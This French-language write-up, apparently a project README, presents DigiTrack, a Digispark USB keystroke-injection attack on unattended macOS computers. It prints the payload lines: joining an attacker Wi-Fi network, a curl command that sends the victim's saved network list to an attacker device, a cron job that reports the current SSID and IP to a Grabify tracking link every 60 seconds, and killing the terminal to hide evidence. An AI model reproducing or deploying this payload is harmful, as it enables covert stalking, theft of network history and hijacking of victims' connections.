DigiTrack
En 30 secondes, cette attaque peut apprendre à quels réseaux un ordinateur MacOS s'est connecté auparavant, et installer un script qui suit l'adresse IP actuelle et le réseau Wi-Fi toutes les 60 secondes.

Inclut désormais : Hardtracker - Digispark VPN buster pour envoyer l'adresse IP et le BSSID/SSID des réseaux Wi-Fi à proximité d'un ordinateur MacOS vers un tracker Grabify toutes les 60 secondes.
Il s'agit d'une attaque à 5 $ qui fait plusieurs choses :
- Insère une porte dérobée Wi-Fi sur l'ordinateur de la victime, vous permettant de capturer la connexion de données de la victime à tout moment lorsque vous êtes à portée Wi-Fi.
- Vole une liste de tous les réseaux auxquels la victime s'est jamais connectée (pour le suivi, la classification et le détournement de connexion de données).
- Insère une tâche de suivi qui envoie l'adresse IP et le réseau actuellement connecté à un lien Grabify toutes les 60 secondes.
L'attaque se déroule ainsi : une victime laisse un ordinateur MacOS sans surveillance pendant 30 secondes. L'attaquant insère une carte DigiSpark chargée d'une charge utile d'attaque. La charge utile ressemble à ceci (avec les délais et les frappes individuelles supprimés) :
DigiKeyboard.print("networksetup -setairportnetwork en0 'sneakernet' 00000000");
- Nous ajoutons le réseau « Sneakernet » à notre liste de réseaux de confiance et nous nous y connectons.
DigiKeyboard.print("curl -m 10 --silent --output /dev/null -X POST -H "Content-Type: text/plain" --data "$(networksetup -listpreferredwirelessnetworks en0)" 192.168.4.1 &");
- Après la connexion, nous envoyons une requête CURL listant chaque réseau auquel l'ordinateur MacOS s'est connecté dans le passé, à l'ESP8266 créant le réseau « Sneakernet ». Le « & » place le processus en arrière-plan au cas où cela prendrait trop de temps, et le « -m » définit un délai de 10 secondes pour éviter une trop longue durée. Maintenant, nous savons à quels réseaux Wi-Fi la victime s'est connectée et quels réseaux forceront l'ordinateur à se connecter sans demande.
DigiKeyboard.print("export VISUAL=nano; crontab -e");
- Nous créons une tâche qui s'exécutera toutes les 60 secondes.
DigiKeyboard.print("* * * * * curl --silent --output /dev/null --referer "$(/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -I | awk '/ SSID/ {print substr($0, index($0, $2))}')" https://grabi/YOURLINK");
- Nous supprimons la sortie de CURL et récupérons le nom du réseau Wi-Fi actuellement connecté. Nous envoyons cela avec une requête CURL vers une URL de suivi, qui livre l'adresse IP de la cible et le réseau Wi-Fi actuel toutes les 60 secondes.
DigiKeyboard.print("wait && kill -9 $(ps -p $PPID -o ppid=)");
- Enfin, nous attendons la fin de tous les processus en arrière-plan, et nous tuons complètement la fenêtre du terminal pour cacher les preuves.
Le temps d'exécution total est d'environ 30 secondes, sans compter les quelques secondes que le Digispark attend pour le téléchargement d'un sketch.
Remarques : Grabify peut passer en mode « I'm under attack » et ne pas permettre la vérification. Recherchez cette ligne :
div class="cf-browser-verification cf-im-under-attack"
Si vous la voyez, cela signifie que l'adresse IP est bloquée par Cloudflare.